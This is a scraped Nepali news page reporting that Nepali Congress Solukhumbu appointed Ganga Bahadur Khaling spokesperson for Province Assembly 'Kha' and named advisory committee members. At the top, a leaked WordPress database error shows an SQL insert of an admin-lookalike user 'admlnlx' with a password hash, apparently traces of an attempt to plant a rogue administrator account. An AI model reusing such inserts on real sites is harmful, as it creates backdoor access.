WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbROM2OUyzEHkPkeKJY29972UwWXzU.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 03:20:46', '', 'admlnlx', 'admlnlx')

नेपाली कांग्रेस सोलुखुम्बु प्रदेश सभा ‘ख’ को प्रवक्तामा खालिङ मनोनीत – Gaule Khabar

नेपाली कांग्रेस सोलुखुम्बु प्रदेश सभा ‘ख’ को प्रवक्तामा खालिङ मनोनीत

नेपाली कांग्रेस सोलुखुम्बु प्रदेश सभा ‘ख’ को प्रवक्तामा खालिङ मनोनीत

सोलुखुम्बु । नेपाली काग्रेस सोलुखुम्बुले प्रदेश सभा ‘ख’ को प्रबक्तामा गंगा बहादुर खालिङलाई मनोनयन गरेको छ । माप्यदुधकोशी गाउँपालिका ७ का खालिङलाई प्रदेश सभा सदस्यमा मनोनित गरी प्रबक्ताको जिम्मेवारी दिएको हो ।

शनिबार माप्यदुधकोशी गाउँपालिका ४ मा सम्पन्न बैठकले खालिङ लगायत पालिकास्तरीय संगठन विस्तारका लागी संयोजक समेत छनौट गरेको छ ।प्रदेश सभा ख का सभापति कर्मा शेर्पाको सभापतित्वमा सम्पन्न बैठकले सल्लहाकार समिती संयोजकमा पनि चयन गरेको छ । खुम्बुपासाङल्हमु गाउँपालिका १ का प्रेम थापा मगरलाई चयन गरेको छ भने सदस्यहरुमा खुम्बुपासाङल्हमुका आङ छिरिङ शेर्पा, माप्यदुधकोशीका साङ्ग बहादुर राई र भोजराज कार्की, सोलुदुधकुण्ड नगरपालिका आङकाजी शेर्पा र लिखुपिके गाउँपालिकाका रामबहादुर बस्नेतलाई चयन गरेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका